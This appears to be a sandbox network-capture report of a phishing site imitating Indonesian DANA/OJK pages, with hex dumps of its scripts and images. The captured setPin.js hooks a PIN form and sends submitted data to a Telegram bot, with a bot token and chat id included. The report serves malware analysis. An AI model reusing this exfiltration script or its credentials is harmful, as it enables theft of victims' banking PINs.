      Data Ascii: Element&&(a=(C=r).documentElement,E=!i(C),p!=C&&(n=C.defaultView)&&n.top!==n&&(n.addEventListener?n.addEventListener("unload",oe,!1):n.attachEvent&&n.attachEvent("onunload",oe)),d.scope=ce(function(e){return a.appendChild(e).appendChild(C.createElement("d
      2024-09-27 02:26:39 UTC1369INData Raw: 75 72 6e 5b 5d 7d 7d 29 2c 62 2e 66 69 6e 64 2e 54 41 47 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 3f 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 3f 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 65 29 3a 64 2e 71 73 61 3f 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 65 29 3a 76 6f 69 64 20 30 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 5b 5d 2c 69 3d 30 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 65 29 3b 69 66 28 22 2a 22 3d 3d 3d 65 29 7b 77 68 69 6c 65 28 6e 3d 6f 5b 69 2b 2b 5d 29 31 3d 3d
      Data Ascii: urn[]}}),b.find.TAG=d.getElementsByTagName?function(e,t){return"undefined"!=typeof t.getElementsByTagName?t.getElementsByTagName(e):d.qsa?t.querySelectorAll(e):void 0}:function(e,t){var n,r=[],i=0,o=t.getElementsByTagName(e);if("*"===e){while(n=o[i++])1==
      2024-09-27 02:26:39 UTC1369INData Raw: 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6e 61 6d 65 3d 64 5d 22 29 2e 6c 65 6e 67 74 68 26 26 76 2e 70 75 73 68 28 22 6e 61 6d 65 22 2b 4d 2b 22 2a 5b 2a 5e 24 7c 21 7e 5d 3f 3d 22 29 2c 32 21 3d 3d 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 65 6e 61 62 6c 65 64 22 29 2e 6c 65 6e 67 74 68 26 26 76 2e 70 75 73 68 28 22 3a 65 6e 61 62 6c 65 64 22 2c 22 3a 64 69 73 61 62 6c 65 64 22 29 2c 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2e 64 69 73 61 62 6c 65 64 3d 21 30 2c 32 21 3d 3d 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 64 69 73 61 62 6c 65 64 22 29 2e 6c 65 6e 67 74 68 26 26 76 2e 70 75 73 68 28 22 3a 65 6e 61 62 6c 65
      Data Ascii: tAttribute("name","D"),e.querySelectorAll("[name=d]").length&&v.push("name"+M+"*[*^$|!~]?="),2!==e.querySelectorAll(":enabled").length&&v.push(":enabled",":disabled"),a.appendChild(e).disabled=!0,2!==e.querySelectorAll(":disabled").length&&v.push(":enable


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      9192.168.2.6497173.70.101.284431672C:\Program Files\Google\Chrome\Application\chrome.exe
      TimestampBytes transferredDirectionData
      2024-09-27 02:26:39 UTC558OUTGET /setPin.js HTTP/1.1
      Host: pengajuan-kartufisik.netlify.app
      Connection: keep-alive
      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
      sec-ch-ua-mobile: ?0
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
      sec-ch-ua-platform: "Windows"
      Accept: */*
      Sec-Fetch-Site: same-origin
      Sec-Fetch-Mode: no-cors
      Sec-Fetch-Dest: script
      Referer: https://pengajuan-kartufisik.netlify.app/
      Accept-Encoding: gzip, deflate, br
      Accept-Language: en-US,en;q=0.9
      2024-09-27 02:26:39 UTC450INHTTP/1.1 200 OK
      Accept-Ranges: bytes
      Age: 0
      Cache-Control: public,max-age=0,must-revalidate
      Cache-Status: "Netlify Edge"; fwd=miss
      Content-Length: 1374
      Content-Type: application/javascript; charset=UTF-8
      Date: Fri, 27 Sep 2024 02:26:39 GMT
      Etag: "734c87f73282109f5dabecd51a905235-ssl"
      Server: Netlify
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      X-Nf-Request-Id: 01J8RMTGB95S165KGMK7N7C60Q
      Connection: close
      2024-09-27 02:26:39 UTC736INData Raw: 0d 0a 20 20 20 20 63 6f 6e 73 74 20 63 68 61 74 5f 69 64 20 3d 20 27 35 38 31 39 38 37 37 39 36 32 27 2c 20 62 6f 74 49 44 20 3d 20 27 62 6f 74 36 37 34 31 37 38 35 32 34 30 3a 41 41 45 39 68 70 5f 32 6c 65 6b 6f 63 67 4a 52 65 57 58 6e 6b 52 67 69 45 47 78 56 53 48 41 2d 68 70 6b 27 3b 0d 0a 20 20 20 20 63 6f 6e 73 74 20 74 65 6c 65 67 72 61 6d 55 52 4c 20 3d 20 60 68 74 74 70 73 3a 2f 2f 61 70 69 2e 74 65 6c 65 67 72 61 6d 2e 6f 72 67 2f 24 7b 62 6f 74 49 44 7d 2f 73 65 6e 64 4d 65 73 73 61 67 65 60 3b 0d 0a 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 27 23 73 65 74 50 69 6e 27 29 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 73 75 62 6d 69 74 22 2c 20 61 73 79 6e 63 20 65 20 3d 3e 20 7b 20 2f 2f 20 57 68
      Data Ascii: const chat_id = '5819877962', botID = 'bot6741785240:AAE9hp_2lekocgJReWXnkRgiEGxVSHA-hpk'; const telegramURL = `https://api.telegram.org/${botID}/sendMessage`; document.querySelector('#setPin').addEventListener("submit", async e => { // Wh
      2024-09-27 02:26:39 UTC638INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 61 64 65 72 73 3a 20 7b 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3a 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 7d 2c 20 2f 2f 20 54 68 69 73 20 69 73 20 72 65 71 75 69 72 65 64 20 77 68 65 6e 20 73 65 6e 64 69 6e 67 20 61 20 4a 53 4f 4e 20 62 6f 64 79 2e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 3a 20 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 7b 63 68 61 74 5f 69 64 2c 20 74 65 78 74 7d 29 2c 20 2f 2f 20 54 68 65 20 62 6f 64 79 20 6d 75 73 74 20 62 65 20 61 20 73 74 72 69 6e 67 2c 20 6e 6f 74 20 61 6e 20 6f 62 6a 65 63 74 0d 0a 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 6d 65 73 73 61 67 65 53 74 61 74 75 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e
      Data Ascii: headers: {"Content-Type": "application/json"}, // This is required when sending a JSON body. body: JSON.stringify({chat_id, text}), // The body must be a string, not an object }); const messageStatus = document.


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      10192.168.2.649723162.19.58.1614431672C:\Program Files\Google\Chrome\Application\chrome.exe
      TimestampBytes transferredDirectionData
      2024-09-27 02:26:39 UTC605OUTGET /fpXTF6b/danaa-4lt.jpg HTTP/1.1
      Host: i.ibb.co
      Connection: keep-alive
      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
      sec-ch-ua-mobile: ?0
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
      sec-ch-ua-platform: "Windows"
      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
      Sec-Fetch-Site: cross-site
      Sec-Fetch-Mode: no-cors
      Sec-Fetch-Dest: image
      Referer: https://pengajuan-kartufisik.netlify.app/
      Accept-Encoding: gzip, deflate, br
      Accept-Language: en-US,en;q=0.9
      2024-09-27 02:26:39 UTC380INHTTP/1.1 200 OK
      Server: nginx
      Date: Fri, 27 Sep 2024 02:26:39 GMT
      Content-Type: image/jpeg
      Content-Length: 15204
      Connection: close
      Last-Modified: Tue, 07 Nov 2023 06:40:44 GMT
      Expires: Thu, 31 Dec 2037 23:55:55 GMT
      Cache-Control: max-age=315360000
      Cache-Control: public
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, OPTIONS
      Accept-Ranges: bytes
      2024-09-27 02:26:39 UTC3716INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff fe 00 3b 43 52 45 41 54 4f 52 3a 20 67 64 2d 6a 70 65 67 20 76 31 2e 30 20 28 75 73 69 6e 67 20 49 4a 47 20 4a 50 45 47 20 76 39 30 29 2c 20 71 75 61 6c 69 74 79 20 3d 20 36 30 0a ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 01 90 03 20 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00
      Data Ascii: JFIF``;CREATOR: gd-jpeg v1.0 (using IJG JPEG v90), quality = 60C ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO "
      2024-09-27 02:26:39 UTC4096INData Raw: 39 35 69 22 48 d7 6a 28 50 3b 01 4f 03 15 8d 6a aa 6a d1 8a 48 da 8d 07 07 79 49 b6 2d 14 51 58 9d 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 55 2d 52 fd 34 fb 47 99 8f 38 f9 47 a9 ab 8c c1 54 92 70 07 26 b8 1f 10 6a 7f da 17 a4 46 c7 c9 8f 85 f4 3e f5 be 1e 8b ab 3b 74 39 b1 55 bd 94 34 dc cc 9a 69 27 99 a5 95 8b 33 1c 92 69 94 51 5e fa 49 2b 23 c1 6d bd 42 8a 28 a6 20 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 f7 ae cb c3 1a b7 da 62 16 93 9f de 20 f9 0f a8 ae 36 a5 b5 9d ed ae 63 9e 33 86 43 9f ad 73 e2 68 2a d0 69 ee 6f 87 ac e9 4e eb 63 d4 01 e2 96 aa 69 b7 89 7d 67 1c e9 fc 43 91 e8 6a d5 78 2d 34 ec cf 7e 32 52 57 42 d1 45 14 8a
      Data Ascii: 95i"Hj(P;OjjHyI-QXEPEPEPEPEPEPEPEPU-R4G8GTp&jF>;t9U4i'3iQ^I+#mB( (((((((((b 6c3Csh*ioNci}gCjx-4~2RWBE
      2024-09-27 02:26:39 UTC4096INData Raw: 4d a7 fd 72 5f e5 5c d9 8f c3 13 ab 2e f8 a4 5e a2 8a 2b cb 3d 71 2a 8e b1 68 b7 ba 6c d0 91 92 57 2b f5 15 7e 9a c3 23 14 27 67 72 64 ae ac 79 5f d7 ad 15 3d f2 79 57 f7 11 8e 02 c8 c0 7e 66 a0 af a4 8b ba 4c f9 a9 2e 56 d1 a9 e1 a9 8c 3a d4 3e 8f 95 35 e8 23 a5 79 9e 98 c5 35 3b 56 1d a5 5f e6 2b d3 07 4a f2 71 eb f7 89 f9 1e be 5f 26 e0 d7 98 b4 51 45 70 9e 80 52 1a 5a 4a 00 a7 a9 5d 2d 9d 84 d3 93 ca af 1f 5e d5 e6 ee c6 47 67 62 4b 31 c9 3e f5 d4 78 ca f7 98 ac 90 ff 00 b6 ff 00 d2 b9 6a f5 f0 34 b9 61 cf dc f1 b1 f5 39 a7 cb d1 05 75 fe 0e b3 d9 04 97 6c 39 90 ed 5f a0 ae 4a 34 69 64 58 d0 65 98 80 07 bd 7a 55 8d b2 da 5a 45 02 f4 45 c6 7d 69 63 ea 72 c1 47 b8 60 29 f3 4d c9 f4 30 fc 61 67 be d6 3b b4 1f 34 47 0d f4 3f fd 7a e3 eb d3 6f 20 5b 9b 59
      Data Ascii: Mr_\.^+=q*hlW+~#'grdy_=yW~fL.V:>5#y5;V_+Jq_&QEpRZJ]-^GgbK1>xj4a9ul9_J4idXezUZEE}icrG`)M0ag;4G?zo [Y
      2024-09-27 02:26:39 UTC3296INData Raw: 01 5e cf d9 b3 cc c7 d0 d3 9e 26 25 2a fd e1 49 4a bf 78 7d 6b d3 96 c7 96 b7 3d 46 2f f5 4b fe ed 49 51 c3 fe a5 3e 82 9f 5f 36 f7 3e 9a 3b 21 68 a4 35 53 53 bb 16 56 13 4f 9e 55 78 fa f6 a1 2b bb 03 92 4a ec e2 3c 45 77 f6 bd 5e 42 0f c9 1f c8 bf d6 b3 28 24 92 49 39 26 8a fa 2a 70 50 8a 8a 3e 6e a4 dc e4 e4 3e 18 9a 69 92 14 fb ce c1 47 e3 5e 97 69 0a db db 47 0a 0f 96 35 0a 3f 0a e3 3c 29 6b f6 8d 57 cd 61 f2 c2 37 7e 27 81 fd 6b ba e9 5e 5e 3e 77 9a 8a e8 7a b9 7d 3b 45 cf b8 b4 51 45 70 9e 80 52 1a 5a 0f 4a 00 f3 ff 00 12 da fd 97 57 90 81 85 97 f7 83 f1 eb fa d6 4d 76 7e 30 b4 12 58 a5 ca 8f 9a 26 c1 fa 1a e3 2b dc c2 54 e7 a4 bc 8f 07 17 4d c2 ab f3 00 48 60 41 c1 07 83 5e 93 a4 dd 0b cd 3a 19 f3 cb 2f 3f 5e 86 bc da ba bf 06 dd e5 26 b4 27 ee fc
      Data Ascii: ^&%*IJx}k=F/KIQ>_6>;!h5SSVOUx+J<Ew^B($I9&*pP>n>iG^iG5?<)kWa7~'k^^>wz};EQEpRZJWMv~0X&+TMH`A^:/?^&'


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      11192.168.2.649724162.19.58.1614431672C:\Program Files\Google\Chrome\Application\chrome.exe
      TimestampBytes transferredDirectionData
      2024-09-27 02:26:39 UTC604OUTGET /khmXKS2/logo-ojk.png HTTP/1.1
      Host: i.ibb.co
      Connection: keep-alive
      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
      sec-ch-ua-mobile: ?0
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
      sec-ch-ua-platform: "Windows"
      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
      Sec-Fetch-Site: cross-site
      Sec-Fetch-Mode: no-cors
      Sec-Fetch-Dest: image
      Referer: https://pengajuan-kartufisik.netlify.app/
      Accept-Encoding: gzip, deflate, br
      Accept-Language: en-US,en;q=0.9
      2024-09-27 02:26:39 UTC379INHTTP/1.1 200 OK
      Server: nginx
      Date: Fri, 27 Sep 2024 02:26:39 GMT
      Content-Type: image/png
      Content-Length: 45960
      Connection: close
      Last-Modified: Sun, 27 Aug 2023 06:53:29 GMT
      Expires: Thu, 31 Dec 2037 23:55:55 GMT
      Cache-Control: max-age=315360000
      Cache-Control: public
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, OPTIONS
      Accept-Ranges: bytes
      2024-09-27 02:26:39 UTC3717INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 58 00 00 01 3b 08 06 00 00 00 01 ee ff b5 00 00 20 00 49 44 41 54 78 9c ec 9d 7b 9c 1c 55 99 f7 7f cf a9 ea 9e 9e c9 64 92 4c 26 93 0b 91 8d 88 88 11 42 08 49 60 11 11 11 91 65 d1 45 57 77 d7 d5 d5 f5 c6 aa 80 49 26 04 70 d5 e5 f5 55 74 21 64 72 43 04 76 c5 5d f7 f5 b6 cb ba 5e 40 10 d0 45 14 02 24 04 42 22 97 24 84 90 0c b9 11 92 49 32 97 9e ee 3a e7 79 ff a8 aa ee ba 76 f7 4c 26 97 99 79 be 1f 9a e9 3e 55 e7 d4 a9 ea 9a a9 5f 7e cf 53 4f 01 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08
      Data Ascii: PNGIHDRX; IDATx{UdL&BI`eEWwI&pUt!drCv]^@E$B"$I2:yvL&y>U_~SO
      2024-09-27 02:26:39 UTC4096INData Raw: d9 90 98 ec 1e aa c6 1e 78 54 4d a8 ae 55 44 60 c4 0a 8b 7a 61 c2 60 d8 30 35 d9 1d 61 21 91 f2 68 9d 50 b2 3b 01 00 83 8c 01 5b 16 38 d7 00 53 d7 00 ae 1f 05 ae ab 07 67 73 40 5d 0e 9c a9 03 db 36 60 d9 25 87 49 b1 06 b4 06 39 45 50 b1 00 2a e4 41 7d bd 40 be 17 c8 77 81 f2 3d 40 6f b7 7f 60 dc 97 bb b9 92 60 4b ab ec ce 6c 00 8d e4 64 f7 c8 33 0b c3 c9 ee 7e 5b 4a b2 bb 17 8a 0c 96 7e a8 96 ec 5e 6a f7 c3 a0 5e 7b 06 d8 d7 67 cc a2 37 ac 59 7d d7 e1 9d b1 82 20 08 82 e0 72 5c 0a ac 5f 9d 75 56 ab 22 5a 4a 44 7f eb 1b 14 41 81 95 24 b2 7c 81 15 ca af f2 34 89 05 84 04 58 ea dd 84 81 b1 52 2b bb 47 9d 9a 60 cd 2c 5f 44 25 e6 5a 79 7b 12 cd b5 52 14 7f fc 4d 50 48 01 f1 e7 13 82 01 62 70 36 07 33 6a 34 9c a6 71 28 34 4f 84 33 ae 15 ce d8 56 98 51 4d 40 36
      Data Ascii: xTMUD`za`05a!hP;[8Sgs@]6`%I9EP*A}@w=@o``Kld3~[J~^j^{g7Y} r\_uV"ZJDA$|4XR+G`,_D%Zy{RMPHbp63j4q(4O3VQM@6
      2024-09-27 02:26:39 UTC4096INData Raw: 68 88 30 fd 0e 41 f7 ae c3 d4 92 0e 15 fa 02 0c 53 a9 da bc 52 40 3e 8f ec 83 0f c0 7e e8 37 a0 bd 7b c1 d9 6c 6a 79 87 52 c8 d1 fb 9c 01 75 16 8d 5e 78 da 53 6b ee 1a 8c f3 5e 10 04 41 38 f6 0c 6b 81 05 00 8f cd 99 f3 b7 16 d1 0f 7c 07 25 96 ec 4e 81 ea ef 70 13 da f7 fe c9 34 3c f3 ae 0b 41 96 15 11 38 e1 7a 57 65 47 a9 52 b2 3b 25 f4 4d 17 40 69 95 dd a3 7d 81 f8 76 d3 c7 a4 d0 98 40 e5 e7 13 06 5d ad 68 b2 7b a9 6f 44 4c d5 5c d9 1d 51 07 cd 5d bf 52 c9 86 c3 4d 76 77 45 1b c3 24 ac 53 6d 4c 63 4c 05 e1 15 69 03 c0 85 02 ec df ff 1e 75 0f fd 06 b4 73 07 d8 b6 e3 42 cb 5b d7 6f 83 7b fe 39 19 e0 87 3d 05 67 d1 cc 75 52 33 4b 10 04 61 a8 33 ec 05 16 00 3c 39 7b ce 4f d8 a2 bf f2 c3 82 69 c9 ee 16 33 0e 8d 6f c1 93 97 5e 06 28 cb 13 20 71 b7 2a 4d bc 24
      Data Ascii: h0ASR@>~7{ljyRu^xSk^A8k|%Np4<A8zWeGR;%M@i}v@]h{oDL\Q]RMvwE$SmLcLiusB[o{9=guR3Ka3<9{Oi3o^( q*M$
      2024-09-27 02:26:39 UTC4096INData Raw: 0b ac 79 0b 16 4d b7 2c b5 aa 8e a8 69 5c eb 84 0a 21 be da 73 ae a2 c2 2b d9 ad 1a cc ea ec 81 30 21 11 0e bc fe 3a 36 6d da 84 8e 9d bb d0 e7 38 a5 72 0b 40 49 54 f5 28 a5 1e 29 3a c5 9f 03 f4 c8 b2 f6 c5 52 05 bc 02 f3 e6 cd cb 41 65 4e b4 14 4d 67 c6 69 b6 6d 9f 6d 8c 99 c9 40 ab d6 3a 9b b5 2c 8c 69 6c c4 c4 09 2d 98 32 65 0a 26 4e 99 8c dc a8 06 80 94 2b ac 82 a2 0b 41 71 d3 ff dc ab 8a cb 4a 46 55 ff 97 c3 2f a6 9a e8 82 95 85 99 ff 27 83 8c 01 d8 c0 18 53 da 3f 02 19 af 3e 99 57 df 83 60 e0 dd ad 69 4c f8 b1 47 88 ef 53 48 10 46 96 c7 c4 22 00 a7 50 c0 81 ce fd e8 c9 f7 f9 e1 c0 bd c6 98 af bf be f7 d0 ed df ff fe ed 72 97 a0 20 08 c7 94 11 2f b0 00 a0 6d e1 75 ff 01 36 1f 6b 1d 37 16 aa be be f4 a8 97 a8 78 02 06 5e 9a c1 0f e3 25 25 bb 27 89 a6
      Data Ascii: yM,i\!s+0!:6m8r@IT():RAeNMgimm@:,il-2e&N+AqJFU/'S?>W`iLGSHF"Pr /mu6k7x^%%'
      2024-09-27 02:26:39 UTC4096INData Raw: ea 47 86 e8 14 c0 0f 71 86 09 3b 5a 04 13 b9 40 05 97 a7 fd 29 ed 6f a8 90 00 18 ad 6f 58 f1 dc 86 ff ec 47 b7 61 c7 a2 45 8b c6 1a 56 f7 31 f3 69 d1 65 4a a9 bc 31 e6 ff 69 ad ef 33 a0 1d 64 74 de b2 54 8b 52 f6 b9 20 7c 16 c0 d4 e0 c5 8d 99 41 8a be d2 d6 b6 e8 f5 f6 f6 c5 2b 82 63 5d 71 d9 44 00 bc 81 40 fb 52 bf 29 22 c3 cc b3 11 b8 20 7b ae fc 1a 72 2f 94 c9 30 29 32 9c 98 c0 ac 94 75 1f c3 24 ed 5b 0f 1b be db 18 fd 4b cd 4e 87 31 2a 6f 29 ab 59 d9 f4 4e 22 7c 0c a0 93 22 fb a6 00 5c 63 67 ea 5f 03 70 73 ea 5c 12 77 8b c0 e0 7f 33 8e f9 09 88 7b 18 de df 5f b6 1a 48 d1 6c 45 f4 01 22 9a 15 15 80 8a d4 df b7 b5 5d fb bf ed ed 37 7f bf 3f db 2b cd d9 32 79 66 b5 86 2a d8 87 ec 2e 9b 89 b0 91 61 08 78 0c a9 7f 6a 08 cc a6 a6 02 bb 8a d4 fb 22 fb 95 87
      Data Ascii: Gq;Z@)ooXGaEV1ieJ1i3dtTR |A+c]qD@R)" {r/0)2u$[KN1*o)YN"|"\cg_ps\w3{_HlE"]7?+2yf*.axj"
      2024-09-27 02:26:39 UTC4096INData Raw: 38 7a fe 18 5e 93 92 f5 4a 38 19 c8 4d 9c 0b b9 a7 e0 3e a7 e2 ee 37 f7 37 13 fa 52 87 0e 9d d7 fe f4 f6 b2 0c 9a 27 24 14 59 f6 2c c5 62 2e ce b3 b2 74 8a 44 80 d1 b2 db 2e 0c 16 43 bd 2b 1e e9 f8 ac e5 42 fb 1f 1f 59 20 cd b6 03 0a ac af 0a 11 c9 fa 78 1b c3 3e 5b 9c b6 f6 35 2b df d4 b1 66 55 d6 86 81 b1 00 11 e7 12 df 52 ea 5e 3b 79 28 24 6e 23 3f 01 c0 ab 51 22 5a d4 d0 d0 52 94 91 7a 7b fb aa 0e b1 0f bd 09 a0 1f 30 53 38 d1 52 9d 19 8b c5 1e 4a b4 b4 5d 5b 4c fb e3 1d a3 65 4e 19 15 68 3a e6 98 78 cc a2 bb 94 c8 bb f6 df f7 0a 84 08 07 f7 fd 03 2f a7 52 fd a4 64 cf 1e d0 53 5b 00 68 c0 24 15 1e 06 67 f0 3c 6b b2 f3 2e 27 22 a8 4e 40 9e 9f c8 01 45 d8 e9 14 48 ae e0 4a 0b d6 94 64 64 70 80 23 aa 62 e6 fe c0 0b 5c 06 ac 02 c6 93 8f 3c 85 d9 91 f9 c7
      Data Ascii: 8z^J8M>77R'$Y,b.tD.C+BY x>[5+fUR^;y($n#?Q"ZRz{0S8RJ][LeNh:x/RdS[h$g<k.'"N@EHJddp#b\<
      2024-09-27 02:26:39 UTC4096INData Raw: 94 4f e8 77 c7 a0 9a 3a 6f 79 6f ef b0 6e b6 98 68 e8 ea 58 f5 7d b1 e5 03 cc 9c e5 53 6c 60 72 b2 d0 bf d9 a1 16 40 3c 6b b7 20 00 63 cc 5e 11 bd ac b3 63 55 c7 50 cb 5b 0c ba da 57 7f d7 4e a5 de 47 44 bb fd 77 74 66 6c 9a 6f 6c 07 a0 72 79 fb ea 95 9f 1b 6a 79 c5 71 36 64 91 0c 47 16 2e 69 6c 1e 75 76 58 0d 0d 89 a9 2a ce 69 ee 34 66 82 e3 68 51 f6 57 69 88 e8 4f 00 7f 20 72 1c ae 14 1b 7c 16 5f 73 cd 75 35 c4 94 e5 d0 56 55 a1 fd f6 ca 16 fa bd c7 73 d0 6f c9 cc 7d 10 a7 b9 a3 63 55 14 b7 74 00 13 8a 60 2d 3e 76 f6 31 20 9c 9e ab 8c 7f e2 73 a7 e7 9b f0 d2 e7 0c 88 6d cb d5 d7 6f ef 19 f6 6d d4 a5 c0 81 7d 19 ab ee c8 a5 51 c9 ad bd a2 00 d7 0c 19 d2 e2 6b c3 aa 62 14 ed 37 c7 bb e3 cf fb 8f 07 3e 6e 39 c3 34 57 61 44 2b 9d 66 39 fe 9e cb c3 86 b9 0b
      Data Ascii: Ow:oyonhX}Sl`r@<k c^cUP[WNGDwtflolryjyq6dG.iluvX*i4fhQWiO r|_su5VUso}cUt`->v1 smom}Qkb7>n94WaD+f9
      2024-09-27 02:26:39 UTC4096INData Raw: a4 05 d9 64 05 e4 09 30 1d 44 2b 43 aa 46 18 c3 a8 aa 39 ec 34 d5 4c 68 1c 22 82 31 fc c3 f4 b9 ad fc 63 77 79 55 05 88 8a 70 6f 40 4f f8 53 54 71 61 63 53 db 47 4b 93 38 37 8c 31 0b 41 18 7c 4e 13 11 44 9c 07 33 7d 3b 8f 2b b4 2f 73 ae 60 a2 d3 87 42 96 08 11 86 02 e3 96 60 11 71 c5 55 db 83 0a 74 55 a8 d2 84 d9 2e 7c 29 5e b4 0f 39 4e 12 28 9e 0c 14 82 fe 10 1c e5 ef f8 1c 2e e4 23 96 7e ff 56 e5 5c 1b 7f 1b b9 da 1a 30 78 07 88 2f ba af 6e 5e 34 11 8d 3b 90 df b7 d5 01 c7 b6 1f 4f 9f ac 6d 5f b9 91 99 5e f4 94 50 ad 6f 6c 5d 36 0b 05 c0 49 a5 be 0c 90 67 bd 4e 55 2d cb e2 7b 9a 13 6d ab 2f 59 bc b8 e4 4d 43 41 30 96 79 9b aa ba 77 2d 8a 63 f3 a0 3f b7 ce 8e f6 2d 84 4c 24 89 01 79 8e 5a bc b4 65 4c d8 6b 46 88 30 2e 09 d6 92 37 bf 39 4e 40 4d fe 92 c5
      Data Ascii: d0D+CF94Lh"1cwyUpo@OSTqacSGK871A|ND3};+/s`B`qUtU.|)^9N(.#~V\0x/n^4;Om_^Pol]6IgNU-{m/YMCA0yw-c?-L$yZeLkF0.79N@M
      2024-09-27 02:26:39 UTC4096INData Raw: fd d6 40 82 f1 ec fc 85 57 10 9b 3b ed 01 32 24 9a a9 2b e8 d7 e2 31 70 d0 4e 39 ef 9c bb 7d cb 93 41 6d 04 e1 d1 79 0b be e3 10 bf df f1 b4 e5 fd 06 00 27 dd af 2f 3f 7d 9c 5d 2f bb 7c ba 2d 7f 79 49 5f 0d d1 af b5 f6 6e fd 48 a1 b2 8f 05 dc 75 fc f1 0f 1d 52 9c 91 3e b7 88 60 14 a7 5e be 65 d3 23 23 29 57 84 08 11 c6 37 c6 ed 12 a1 a8 3c 63 80 a2 6d 16 dc 08 d2 c4 78 dc 12 10 2f c8 aa 34 ce 40 4c 75 44 64 85 69 56 bc 1f cd 91 17 d2 3e 00 25 7d b6 f2 92 e7 47 a1 32 e6 aa eb 3e 36 c0 7e c7 91 0f 17 43 ae 00 20 e5 68 1b 01 1e db 15 bf 76 4a 7d 9b 0c c2 64 f1 b7 50 4c 79 05 00 a6 8b 6e a9 af 5f 98 95 1d 21 42 84 08 11 8a c2 b8 25 58 6b 9f 7e fa 19 05 ca de 49 18 86 7e bb 15 7a 57 39 ed 8f 05 08 f8 df 52 e9 c9 5d c3 49 89 9b 64 85 11 ac 30 02 23 82 df 0f d9
      Data Ascii: @W;2$+1pN9}Amy'/?}]/|-yI_nHuR>`^e##)W7<cmx/4@LuDdiV>%}G2>6~C hvJ}dPLyn_!B%Xk~I~zW9R]Id0#
